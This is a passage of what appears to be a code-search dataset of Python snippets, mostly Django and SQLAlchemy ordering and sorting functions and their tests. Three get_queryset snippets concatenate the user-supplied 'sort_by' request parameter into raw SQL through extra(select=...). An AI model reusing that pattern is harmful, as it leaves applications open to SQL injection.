sorting_attribute is not None: # empty string as sorting_attribute is valid\n return _sort_queryset_by_attribute(\n queryset, sorting_attribute, sorting_direction\n )\n\n sort_enum = sort_by._meta.sort_enum\n sorting_fields = sort_enum.get(sorting_field)\n sorting_field_name = sorting_fields.name.lower()\n\n custom_sort_by = getattr(sort_enum, f\"qs_with_{sorting_field_name}\", None)\n if custom_sort_by:\n queryset = custom_sort_by(queryset)\n\n sorting_field_value = sorting_fields.value\n sorting_list = [f\"{sorting_direction}{field}\" for field in sorting_field_value]\n\n return queryset.order_by(*sorting_list)", "def get_queryset(self):\n qs = super(SortForm, self).get_queryset()\n\n qs = self.pre_sort(qs)\n\n # Ensure that the form is valid\n if not self.is_valid():\n return qs\n\n # Do Sorting\n sorts = self.cleaned_data.get('sort', [])\n order_by = []\n for sort in sorts:\n param = self.HEADERS[abs(sort) - 1]['column']\n if sort < 0:\n param = '-' + param\n order_by.append(param)\n\n if order_by:\n qs = qs.order_by(*order_by)\n\n qs = self.post_sort(qs)\n\n return qs", "def order_by(self, *field_names):\n assert self.query.can_filter(), \\\n \"Cannot reorder a query once a slice has been taken.\"\n\n clone = self._clone()\n for field_name in field_names:\n clone.query.order_by.append(field_name)\n return clone", "def test_ordering_descending_unset(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = True\n\n f = F({'o': '-username'}, queryset=self.qs)\n self.assertQuerysetEqual(\n f.qs, ['jacob', 'carl', 'alex', 'aaron'], lambda o: o.username)", "def order_by(self, value):\r\n # collapse empty values to ()\r\n order_by = () if not value else value\r\n # accept string\r\n order_by = order_by.split(',') if isinstance(order_by, six.string_types) else order_by\r\n valid = []\r\n # everything's been converted to a iterable, accept iterable!\r\n for alias in order_by:\r\n name = OrderBy(alias).bare\r\n if name in self.columns and self.columns[name].orderable:\r\n valid.append(alias)\r\n self._order_by = OrderByTuple(valid)\r\n self.data.order_by(self._order_by)", "def filter_and_order(cls, *args, **kwargs):\n return cls.query.filter_by(**kwargs).order_by(*args)", "def clean_order_by(self):\n\t\tresult = None\n\t\tmap_id = self.cleaned_data.get('order_by', '')\n\t\tif self._ORDER_BY_MAP.has_key(map_id):\n\t\t\tresult = self._ORDER_BY_MAP.get(map_id)\n\t\telse:\n\t\t\tresult = self._ORDER_BY_MAP.values()[0]\n\t\treturn result", "def sort_by(self, sort_direction: epl_imagery_pb2.SortDirection):\n # TODO if you want to sort by multiple parameters, then this class will have to have a pointer to the filter\n if self.metadata_filters.sorted_by:\n self.metadata_filters.sorted_by.query_params.sort_direction = epl_imagery_pb2.NOT_SORTED\n\n self.metadata_filters.sorted_by = self\n\n # class that contains it, and upon updating this class there is a call back to the container class to insert\n # this parameter in a list\n self.query_params.sort_direction = sort_direction\n self.b_initialized = True", "def order_by(self, *fields):\n self._evaluated = False\n if self._order is None:\n self._order = []\n\n for field in fields:\n direction = \"asc\"\n if field.startswith('-'):\n direction = \"desc\"\n field = field[1:]\n\n self._order.append({ field : direction })\n\n return self", "def orderby(cls, field, desc=False):\n cls.runtime.set_orderby((field, desc))\n return cls", "def order_by(self, field_name, direction=ASCENDING):\n\n from 
jetengine.fields.base_field import BaseField\n from jetengine.fields.list_field import ListField\n\n if isinstance(field_name, (ListField,)):\n raise ValueError(\n \"Can't order by a list field. If you meant to order by the size of the list, please use either an Aggregation Pipeline query (look for Document.objects.aggregate) or create an IntField with the size of the list field in your Document.\"\n )\n\n if isinstance(field_name, (BaseField,)):\n field_name = field_name.name\n\n if field_name not in self.__klass__._fields:\n raise ValueError(\n \"Invalid order by field '%s': Field not found in '%s'.\" % (field_name, self.__klass__.__name__)\n )\n\n field = self.__klass__._fields[field_name]\n self._order_fields.append((field.db_field, direction))\n return self", "def pre_sort(self, qs):\n return qs", "def ordering(self, qs):\n request = self.request\n # Number of columns that are used in sorting\n try:\n i_sorting_cols = int(request.REQUEST.get('iSortingCols', 0))\n except ValueError:\n i_sorting_cols = 0\n\n order = []\n order_columns = self.get_order_columns()\n for i in range(i_sorting_cols):\n # sorting column\n try:\n i_sort_col = int(request.REQUEST.get('iSortCol_%s' % i))\n except ValueError:\n i_sort_col = 0\n # sorting order\n s_sort_dir = request.REQUEST.get('sSortDir_%s' % i)\n\n sdir = '-' if s_sort_dir == 'desc' else ''\n\n sortcol = order_columns[i_sort_col]\n if isinstance(sortcol, list):\n for sc in sortcol:\n order.append('%s%s' % (sdir, sc))\n else:\n order.append('%s%s' % (sdir, sortcol))\n if order:\n return qs.order_by(*order)\n return qs", "def ordering(self):\r\n if hasattr(self, \"queryset\"):\r\n aliases = {}\r\n for bound_column in self.table.columns:\r\n aliases[bound_column.order_by_alias] = bound_column.order_by\r\n try:\r\n return next(segment(self.queryset.query.order_by, aliases))\r\n except StopIteration:\r\n pass", "def order_by(self, field, descending=False):\n self._order_by.append((field, descending))\n return self", "def orderby():\n pass", "def order_by(self, *field_names):\n if self.query.is_sliced:\n raise TypeError(\"Cannot reorder a query once a slice has been taken.\")\n obj = self._chain()\n obj.query.clear_ordering(force=True, clear_default=False)\n obj.query.add_ordering(*field_names)\n return obj", "def get_sort_field(self, kind, order, is_number):\n pass", "def order(self, field, direction=Order.ASC):\n if field == 'id':\n field = '_id'\n\n self._order_by.append((field, direction))\n\n return self", "def sortby(self):\n ...", "def get_sort_by(self):\n\n\t\treturn self.__sort_by", "def get_queryset(self):\n rs = super(BaseQuerysetMixin, self).get_queryset()\n if self.request.GET.get(\"ordering\") is None:\n rs = rs.order_by(\"id\")\n return rs", "def get_sort_by(self) -> SortField:\n if hasattr(self, \"json\") and isinstance(self.json, dict):\n sort_by_str = self.json.get(\"sort_by\", \"relevance\")\n if SortField.is_sort_field(sort_by_str):\n return SortField.from_str(sort_by_str)\n return SortField.relevance", "def __order_queryset(self, queryset):\n if self.get_paginate_by(queryset) and \\\n self.request.method == \"POST\" and self.__has_initially_selected_items():\n current_order_by = list(queryset.query.order_by)\n whenqueries = []\n max_index = 0\n for index, value in enumerate(self.get_selected_values_queryset().order_by(*current_order_by)):\n whenqueries.append(models.When(pk=value.pk, then=models.Value(index)))\n max_index = index\n queryset = queryset.annotate(\n cradmin_multiselect2_ordering=models.Case(\n *whenqueries,\n 
default=max_index + 1,\n output_field=models.IntegerField()\n )\n )\n order_by = ['cradmin_multiselect2_ordering']\n order_by.extend(current_order_by)\n queryset = queryset.order_by(*order_by)\n return queryset", "def order_by(self, *args):\n order_clauses = self.order_clauses[:]\n related_clauses = self.related_clauses[:]\n model = self.proxy.model\n for arg in args:\n if isinstance(arg, str):\n # Convert django-style to sqlalchemy ordering column\n if arg[0] == '-':\n field = arg[1:]\n ascending = False\n else:\n field = arg\n ascending = True\n\n col = resolve_member_column(model, field, related_clauses)\n\n if ascending:\n clause = col.asc()\n else:\n clause = col.desc()\n else:\n clause = arg\n if clause not in order_clauses:\n order_clauses.append(clause)\n return self.clone(order_clauses=order_clauses,\n related_clauses=related_clauses)", "def order_by(self):\r\n if self.column.order_by is not None:\r\n order_by = self.column.order_by\r\n else:\r\n # default to using column accessor as data source sort key\r\n order_by = OrderByTuple((self.accessor, ))\r\n return order_by.opposite if self.order_by_alias.is_descending else order_by", "def post_sort(self, qs):\n return qs", "def get_queryset(self):\n\n qs = super().get_queryset() # get company specific queryset\n\n filters = dict(self.request.GET.lists()) # dictionary of lists\n\n # pull out order_by and order\n order_by = filters.pop(\"order_by\", None)\n order = filters.pop(\"order\", None)\n\n # Ordering by JSON field taken from\n # https://stackoverflow.com/questions/36641759/django-1-9-jsonfield-order-by\n # Jan 2, 2018\n\n if order_by:\n if order:\n pass\n # TODO: Figure out what can be done for ordering...\n\n else:\n qs = qs.order_by(\"-id\") # default to descending id order\n\n for exp_filter in filters:\n try:\n qs = self.FILTERS[exp_filter](qs, filters[exp_filter])\n except KeyError:\n pass\n # do nothing if not a filter\n\n return qs", "def filter_queryset(self, qs):\n qs = super(ReleaseViewSet, self).filter_queryset(qs)\n if getattr(self, 'order_queryset', False):\n return sorted(qs, key=models.Release.version_sort_key)\n return qs", "def order_queryset_by_sort_order(get, qs):\n\n def get_string_from_tuple_list(lstTuples, number):\n \"\"\"Get the string value corresponding to a number in a list of number-string tuples\"\"\"\n sBack = [tup[1] for tup in lstTuples if tup[0] == number]\n return sBack\n\n # Helper: order a queryset on field [sOrder], which is a number from a list of tuples named [sListName]\n def order_queryset_by_tuple_list(qs, sOrder, sListName):\n \"\"\"Order a queryset on field [sOrder], which is a number from a list of tuples named [sListName]\"\"\"\n\n # Get a list of tuples for this sort-order\n tpList = build_choice_list(sListName)\n # Determine sort order: ascending is default\n bReversed = False\n if (sOrder[0:1] == '-'):\n # A starting '-' sign means: descending order\n sOrder = sOrder[1:]\n bReversed = True\n\n # Order the list of tuples alphabetically\n # (NOTE: they are alphabetical from 'build_choice_list()', except for the values 0,1)\n tpList = sorted(tpList, key=operator.itemgetter(1))\n # Order by the string-values in the tuple list\n return sorted(qs, key=lambda x: get_string_from_tuple_list(tpList, getattr(x, sOrder)), reverse=bReversed)\n\n # Set the default sort order\n sOrder = 'woord' # Default sort order if nothing is specified\n # See if the form contains any sort-order information\n if ('sortOrder' in get and get['sortOrder'] != ''):\n # Take the user-indicated sort order\n sOrder 
= get['sortOrder']\n\n # The ordering method depends on the kind of field:\n # (1) text fields are ordered straightforwardly\n # (2) fields made from a choice_list need special treatment\n if (sOrder.endswith('handedness')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Handedness\")\n elif (sOrder.endswith('domhndsh') or sOrder.endswith('subhndsh')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Handshape\")\n elif (sOrder.endswith('locprim')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Location\")\n else:\n # Use straightforward ordering on field [sOrder]\n ordered = qs.order_by(sOrder)\n\n # return the ordered list\n return ordered", "def get_queryset(self):\n search_str = self.request.GET.get('search')\n col_nm = self.request.GET.get('sort_by', \"name\")\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', \"ASC\")\n self.sort_ordr=sort_order\n\n if search_str:\n search_str = self.request.GET.get('search', None)\n a = Q(name__icontains=search_str)\n b = Q(administrator__first_name__icontains = search_str)\n c = Q(administrator__last_name__icontains = search_str)\n d = Q(administrator__username__icontains = search_str)\n e = Q(types__name__icontains = search_str)\n f = Q(description__icontains = search_str)\n objects = Organization.objects.filter(a | b | c | d | e | f).distinct()\n\n else: # SORTING BY COL_NM\n if col_nm in ['name', 'description'] :\n objects = Organization.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n elif col_nm =='administrator__first_name':\n objects=Organization.objects.filter().order_by(col_nm)\n if sort_order == \"DESC\":\n objects = objects.reverse()\n else:\n objects=Organization.objects.extra(select=\n {'name':'lower(name)'}).order_by('name')\n\n\n return objects", "def get_queryset(self, request):\n queryset = self.model._default_manager.all()\n queryset = queryset.filter(user=request.user)\n ordering = self.get_ordering()\n if ordering:\n if isinstance(ordering, str):\n ordering = (ordering,)\n queryset = queryset.order_by(*ordering)\n return queryset", "def test_relatedfieldlistfilter_foreignkey_default_ordering(self):\n\n class BookAdmin(ModelAdmin):\n list_filter = (\"employee\",)\n\n self.addCleanup(setattr, Employee._meta, \"ordering\", Employee._meta.ordering)\n Employee._meta.ordering = (\"name\",)\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(self.jack.pk, \"Jack Red\"), (self.john.pk, \"John Blue\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def test_entities__Entity__setFieldOrder__2(entity_with_field):\n entity = entity_with_field\n entity.setFieldOrder(['dummy2', 'I-do-not-exist', 'dummy'])\n assert ['dummy2', 'dummy'] == entity.getFieldOrder()\n # Unknown field names are not written into storage:\n order_storage = zope.component.getUtility(IOrderStorage)\n assert (['dummy2', 'dummy'] ==\n order_storage.byNamespace(entity.order_storage_namespace))", "def test_entities__Entity__setFieldOrder__1(entity_with_field, field):\n assert [] == entity_with_field.getFieldOrder()\n entity_with_field.setFieldOrder(['dummy2', field.__name__, 'dummy'])\n assert (['dummy2', field.__name__, 'dummy'] ==\n entity_with_field.getFieldOrder())", "def test_relatedonlyfieldlistfilter_foreignkey_default_ordering(self):\n\n 
class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n self.addCleanup(setattr, Employee._meta, \"ordering\", Employee._meta.ordering)\n Employee._meta.ordering = (\"name\",)\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def _get_order_by(order, orderby, order_by_fields):\n try:\n # Find the actual database fieldnames for the keyword.\n db_fieldnames = order_by_fields[orderby]\n except KeyError:\n raise ValueError(\n \"Invalid value for 'orderby': '{}', supported values are: {}\".format(\n orderby, \", \".join(sorted(order_by_fields.keys()))\n )\n )\n\n # Default to descending for some fields, otherwise be ascending\n is_desc = (not order and orderby in ORDER_BY_DESC) or (order or \"asc\").lower() in (\n \"desc\",\n \"descending\",\n )\n\n if is_desc:\n return map(lambda name: \"-\" + name, db_fieldnames)\n else:\n return db_fieldnames", "def get_ordering(self, request, queryset, view):\n ordering = []\n params = get_datatables_ordering(request.query_params)\n if params:\n fields = [param.strip() for param in params.split(',')]\n ordering = self.remove_invalid_fields(queryset, fields, view, request)\n if ordering:\n return ordering\n\n # No ordering was included, or all the ordering fields were invalid\n return self.get_default_ordering(view)", "def set_sorting_enabled(self, value):\n self.tableWidget.setSortingEnabled(value)", "def sort(self, column, order=Qt.AscendingOrder):\n if(column == Columns.Date):\n self.sorting = Sorting.Date\n elif(column == Columns.Code):\n self.sorting = Sorting.Code\n elif(column == Columns.User):\n self.sorting = Sorting.User\n elif(column == Columns.Tags):\n self.sorting = Sorting.Priviledges\n elif(column == Columns.TimesRequested):\n self.sorting = Sorting.TimesRequested\n\n if(order == Qt.DescendingOrder):\n self.sorting |= Sorting.Reversed\n\n self._reset_view()", "def _apply_order_by_and_limit(objects, order_by=None, limit=None):\n if order_by:\n try:\n # Note: currently we sort only by the first column from the list\n order_by = order_by[0]\n order_field = order_by[\"name\"]\n order_desc = order_by.get(\"desc\", False)\n objects = sorted(\n objects,\n key=lambda obj: getattr(obj, order_field),\n reverse=order_desc,\n )\n except:\n raise BadQueryException(\"Bad query: Invalid 'order_by' parameter\")\n\n if limit:\n try:\n from_, to_ = limit\n objects = objects[from_: to_]\n except:\n raise BadQueryException(\"Bad query: Invalid 'limit' parameter.\")\n\n return objects", "def test_entities__Entity__getFieldOrder__2(entity_with_field, field):\n entity = entity_with_field\n entity.setFieldOrder([field.__name__, 'dummy'])\n assert [field.__name__, 'dummy'] == entity.getFieldOrder()", "def test_order_by(self):\n self.Person(name=\"User B\", age=40).save()\n self.Person(name=\"User A\", age=20).save()\n self.Person(name=\"User C\", age=30).save()\n\n names = [p.name for p in self.Person.objects.order_by(\"-age\")]\n assert names == [\"User B\", \"User C\", \"User A\"]\n\n names = [p.name for p in 
self.Person.objects.order_by(\"+age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n ages = [p.age for p in self.Person.objects.order_by(\"-name\")]\n assert ages == [30, 40, 20]\n\n ages = [p.age for p in self.Person.objects.order_by()]\n assert ages == [40, 20, 30]\n\n ages = [p.age for p in self.Person.objects.order_by(\"\")]\n assert ages == [40, 20, 30]", "def queryset(self, ordering=None):\r\n qs = self.model._default_manager.get_query_set()\r\n if not ordering:\r\n ordering = self.ordering or () # otherwise we might try to *None, which is bad ;)\r\n if ordering:\r\n qs = qs.order_by(*ordering)\r\n return qs", "def sort(self, *order_fields):\n return MockSearch(\n self, self._query, self.nested_filter_calls, order_fields,\n self._script_fields\n )", "def order_by(self, aliases):\r\n accessors = []\r\n for alias in aliases:\r\n bound_column = self.table.columns[OrderBy(alias).bare]\r\n # bound_column.order_by reflects the current ordering applied to\r\n # the table. As such we need to check the current ordering on the\r\n # column and use the opposite if it doesn't match the alias prefix.\r\n if alias[0] != bound_column.order_by_alias[0]:\r\n accessors += bound_column.order_by.opposite\r\n else:\r\n accessors += bound_column.order_by\r\n if hasattr(self, \"queryset\"):\r\n translate = lambda accessor: accessor.replace(Accessor.SEPARATOR, QUERYSET_ACCESSOR_SEPARATOR)\r\n self.queryset = self.queryset.order_by(*(translate(a) for a in accessors))\r\n else:\r\n self.list.sort(key=OrderByTuple(accessors).key)", "def get_queryset(self):\n\n search_str = self.request.GET.get('search', None)\n col_nm = self.request.GET.get('sort_by', \"name\")\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', \"ASC\")\n self.sort_ordr=sort_order\n if search_str:\n a = Q(name__icontains = search_str)\n b = Q(description__icontains = search_str)\n objects = self.model.objects.filter(a | b).distinct()\n\n else:\n objects = OrganizationType.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n return objects", "def sortby(self):\n return self._sortby", "def order_query(self, query):\n\n direction = desc if self.direction == 'desc' else asc\n if self.order in inspect(self.model_class).columns.keys():\n attribute = getattr(self.model_class, self.order)\n elif self.order == 'group.name':\n attribute = func.coalesce(UserGroup.name, '')\n elif self.order == 'user.realname':\n attribute = func.coalesce(User.realname, '')\n elif self.order == 'user.username':\n attribute = func.coalesce(User.username, '')\n elif self.order == 'user.name':\n attribute = func.coalesce(User.realname, User.username, '')\n else:\n attribute = self.model_class.first_issue\n\n return query.order_by(None).order_by(direction(attribute))", "def _sort_by_query_string_param(self, songs):\n orderable_fields_dict = {\n 'name': Lower('name'),\n 'artist': Lower('artist__name'),\n 'avgRating': 'average_rating',\n 'year': 'year'\n }\n\n order_by = self.request.query_params.get('orderBy', None)\n\n if order_by is not None and order_by in orderable_fields_dict:\n order_field = orderable_fields_dict[order_by]\n\n # sort in direction indicated by `direction` query string param\n # or ascending, by default\n direction = self.request.query_params.get('direction', 'asc')\n if direction == 'desc':\n if order_by == 
'name' or order_by == 'artist':\n order_field = order_field.desc()\n else:\n order_field = '-' + order_field\n\n # add annotation for average_rating to sort by computed property\n if order_by == 'avgRating':\n songs = songs.annotate(\n average_rating=Avg('ratings__rating')\n )\n\n songs = songs.order_by(order_field)\n\n return songs", "def sort_from_request(request):\n order = request.args.get('order_by')\n if order:\n key, direction = order.split(',')\n reverse = False if direction == 'ASC' else True\n return Sort(key, reverse)\n else:\n return Sort(None)", "def validate_sort_order(filter, main_field):\n\n # The tiebreaker fields are always in the same order, but\n # if the main sort field is one of the tiebreaker fields,\n # it's removed from the list -- there's no need to sort on\n # that field a second time.\n default_sort_fields = [\n {x: \"asc\"} for x in ['sort_author', 'sort_title', 'work_id']\n if x != main_field\n ]\n assert default_sort_fields == filter.sort_order[1:]\n return filter.sort_order[0]", "def test_relatedfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = (\"employee\",)\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(self.jack.pk, \"Jack Red\"), (self.john.pk, \"John Blue\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def _orderby_expression(self):\n return ''", "def order_by(cls, *args):\n return cls.query.order_by(*args)", "def order_by(self, column, direction=\"ASC\"):\n self._order_by += ((column, direction),)\n return self", "def add_sort(self, field_name, ascending=True):\n if not self._query_is_empty():\n self.query.AND()\n if ascending:\n logger.info(\"Sorting records by {} in ascending order.\".format(field_name))\n self.query.field(field_name.lower()).order_ascending() # lowercase for convenience\n logger.debug(\"sysparm_query contains: {q}\".format(q=self.query._query))\n else:\n logger.info(\"Sorting records by {} in descending order.\".format(field_name))\n self.query.field(field_name.lower()).order_descending()\n logger.debug(\"sysparm_query contains: {q}\".format(q=self.query._query))", "def get_query_set(model_class, sort_column=\"id\", sort_descending=True, filters={}): \n sort_modifier = \"\"\n if sort_descending:\n sort_modifier = \"-\"\n return model_class.objects.filter(**filters).order_by(\"%s%s\"% (sort_modifier, sort_column))", "def test_relatedonlyfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, 
\"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def on_combo_sort_col_names_currentIndexChanged(self, index):\n if self.ui.sort_radio_asc.isChecked():\n self.model.setSort(index, Qt.AscendingOrder)\n else:\n self.model.setSort(index, Qt.DescendingOrder)\n self.model.select()", "def order_by_alias(self):\r\n order_by = OrderBy((self.table.order_by or {}).get(self.name, self.name))\r\n order_by.next = order_by.opposite if self.is_ordered else order_by\r\n return order_by", "def update_order_property_setter(self, has_custom, fieldname):\n\t\tproperty_name = f\"{fieldname}_order\"\n\t\tif has_custom:\n\t\t\t# save the order of the actions and links\n\t\t\tself.make_property_setter(\n\t\t\t\tproperty_name, json.dumps([d.name for d in self.get(fieldname)]), \"Small Text\"\n\t\t\t)\n\t\telse:\n\t\t\tfrappe.db.delete(\"Property Setter\", dict(property=property_name, doc_type=self.doc_type))", "def set_sort_order(self, sort_order):\n\n\t\tif sort_order is not None and not isinstance(sort_order, str):\n\t\t\traise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: sort_order EXPECTED TYPE: str', None, None)\n\t\t\n\t\tself.__sort_order = sort_order\n\t\tself.__key_modified['sort_order'] = 1", "def changeOrder(self):\n order = self.orderSpinBox.value()\n nfilter = int(str(self.filterComboBox.currentText()))\n if order > nfilter - 2:\n order = nfilter - 2\n if order < 1:\n order = 1\n self.orderSpinBox.setValue(order)\n self.order = order", "def order_by(self, *colnames):\r\n if len(colnames) == 0:\r\n clone = copy.deepcopy(self)\r\n clone._order = []\r\n return clone\r\n\r\n conditions = []\r\n for colname in colnames:\r\n conditions.append('\"{}\" {}'.format(*self._get_ordering_condition(colname)))\r\n\r\n clone = copy.deepcopy(self)\r\n clone._order.extend(conditions)\r\n return clone", "def resolve_orderby(self, orderby: Optional[Union[List[str], str]]) -> List[OrderBy]:\n validated: List[OrderBy] = []\n\n if orderby is None:\n return validated\n\n if isinstance(orderby, str):\n if not orderby:\n return validated\n\n orderby = [orderby]\n\n orderby_columns: List[str] = orderby if orderby else []\n\n resolved_orderby: Union[str, SelectType, None]\n for orderby in orderby_columns:\n bare_orderby = orderby.lstrip(\"-\")\n bare_orderby = self.tag_to_prefixed_map.get(bare_orderby, bare_orderby)\n try:\n # Allow ordering equations with the calculated alias (ie. equation[0])\n if is_equation_alias(bare_orderby):\n resolved_orderby = bare_orderby\n # Allow ordering equations directly with the raw alias (ie. 
equation|a + b)\n elif is_equation(bare_orderby):\n resolved_orderby = self.equation_alias_map[strip_equation(bare_orderby)]\n bare_orderby = resolved_orderby.alias\n else:\n resolved_orderby = self.resolve_column(bare_orderby)\n except (NotImplementedError, IncompatibleMetricsQuery):\n resolved_orderby = None\n\n direction = Direction.DESC if orderby.startswith(\"-\") else Direction.ASC\n\n if fields.is_function(bare_orderby) and (\n isinstance(resolved_orderby, Function)\n or isinstance(resolved_orderby, CurriedFunction)\n or isinstance(resolved_orderby, AliasedExpression)\n ):\n bare_orderby = resolved_orderby.alias\n\n for selected_column in self.columns:\n if isinstance(selected_column, Column) and selected_column == resolved_orderby:\n validated.append(OrderBy(selected_column, direction))\n break\n elif (\n isinstance(selected_column, AliasedExpression)\n and selected_column.alias == bare_orderby\n ):\n if bare_orderby in self.orderby_converter:\n validated.append(self.orderby_converter[bare_orderby](direction))\n break\n # We cannot directly order by an `AliasedExpression`.\n # Instead, we order by the column inside.\n validated.append(OrderBy(selected_column.exp, direction))\n break\n\n elif (\n isinstance(selected_column, CurriedFunction)\n and selected_column.alias == bare_orderby\n ):\n if bare_orderby in self.orderby_converter:\n validated.append(self.orderby_converter[bare_orderby](direction))\n validated.append(OrderBy(selected_column, direction))\n break\n\n if len(validated) == len(orderby_columns):\n return validated\n\n # TODO: This is no longer true, can order by fields that aren't selected, keeping\n # for now so we're consistent with the existing functionality\n raise InvalidSearchQuery(\"Cannot sort by a field that is not selected.\")", "def get_paginate_by(self, queryset):\n return self.request.GET.get('paginate_by', self.paginate_by)", "def get_queryset(self):\n search_str = self.request.GET.get('search', None)\n col_nm = self.request.GET.get('sort_by', 'title')\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', 'ASC')\n self.sort_ordr=sort_order\n if search_str:\n search_str = self.request.GET.get('search', None)\n a = Q(title__icontains = search_str)\n b = Q(description__icontains = search_str)\n objects = Designation.objects.filter(a | b).distinct()\n else: # SORTING BY COL_NM\n objects = Designation.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n return objects", "def get_default_paginate_by(self, queryset):\n return self.paginate_by", "def get_queryset(self):\n queryset = super(viewsets.ModelViewSet, self).get_queryset().order_by('first_name')\n\n if self.request.GET.get('q', None):\n return queryset.filter(username__icontains=self.request.GET['q'])\n return queryset", "def __init__(\n self,\n queryset,\n per_page=25,\n ordering=\"pk\",\n allow_count=False,\n allow_empty_first_page=True,\n orphans=0,\n ):\n self.queryset = queryset\n self.per_page = int(per_page)\n self.ordering = ordering\n self.allow_count = allow_count\n\n field = ordering.replace(\"-\", \"\")\n self._reverse_ordering = field if ordering[0] == \"-\" else \"-{0}\".format(ordering)\n self._field = field", "def sort_field():\n _id = request.form['_id']\n old_index = request.form['old_index']\n new_index = request.form['new_index']\n data, code, message = FIELD_SERVICE.sort_field(_id, old_index, new_index)\n return __result(data, code, message)", "def sort(self, field='word', 
order=None):\n self.data = list(self.sorted(field, order))", "def order_by(self, *orderings):\n return OrderedQuery(self, orderings)", "def ordered(self):\n if isinstance(self, EmptyQuerySet):\n return True\n if self.query.extra_order_by or self.query.order_by:\n return True\n elif (\n self.query.default_ordering\n and self.query.get_meta().ordering\n and\n # A default ordering doesn't affect GROUP BY queries.\n not self.query.group_by\n ):\n return True\n else:\n return False", "def order_by(self, *fields):\n doc = []\n for field in fields:\n if field.startswith('-'):\n doc.append((field.strip('-'), pymongo.DESCENDING))\n else:\n doc.append((field, pymongo.ASCENDING))\n return self.sort(doc)", "def pre_filter(self, qs):\n return qs", "def test_shelflistitem_view_orderby(order_by, api_settings, shelflist_solr_env,\n get_shelflist_urls, api_client):\n sl_urls = get_shelflist_urls(shelflist_solr_env.records['shelflistitem'])\n test_url = '{}?orderBy={}'.format(sl_urls.values()[0], order_by)\n response = api_client.get(test_url)\n assert response.status_code == 400\n assert 'not a valid field for ordering' in response.data['detail']", "def sort_on(self):\n if \"sortOn\" in self._prop_dict:\n return self._prop_dict[\"sortOn\"]\n else:\n return None", "def list(self, request, *args, **kwargs):\n self.order_queryset = True\n if 'ordering' in request.query_params.keys():\n self.order_queryset = False\n return super(ReleaseViewSet, self).list(request, *args, **kwargs)", "def queryset(self, request):\n qs = self.model.all_objects.get_query_set()\n ordering = self.ordering or ()\n if ordering:\n qs = qs.order_by(*ordering)\n return qs", "def setSearchFieldnames(self, fieldnames):\n self._search_fieldnames = fieldnames", "def sort_order(self, sort_order):\n\n self._sort_order = sort_order", "def setFieldNames(self, model, lyr): \n #get the fields\n fields = lyr.pendingFields()\n position = 0\n \n #set column names\n for field in fields:\n model.setHorizontalHeaderItem(position, QStandardItem(field.name()))\n position+=1", "def get_queryset(self, request):\n querys = self.model.all_objects.get_queryset()\n ordering = self.get_ordering(request)\n if ordering:\n querys = querys.order_by(*ordering)\n return querys", "def default_sort_column(self, default_sort_column):\n\n self._default_sort_column = default_sort_column", "def get_sort_query(self, kind, order, is_number):\n pass", "def testSortNoDbAscending(self):\n self.request.GET['sort'] = \"custom\"\n self.datagrid.load_state()\n self.assertEqual(self.datagrid.sort_list, [\"custom\"])\n self.assertEqual(len(self.datagrid.rows), self.datagrid.paginate_by)\n self.assertEqual(self.datagrid.rows[0]['object'].name, \"Group 04\")\n self.assertEqual(self.datagrid.rows[1]['object'].name, \"Group 08\")\n self.assertEqual(self.datagrid.rows[2]['object'].name, \"Group 12\")\n\n # Exercise the code paths when rendering\n self.datagrid.render_listview()", "def order_by_as_sql(self):\n return comma_join([\n '%s DESC' % field[1:] if isinstance(field, str) and field[0] == '-' 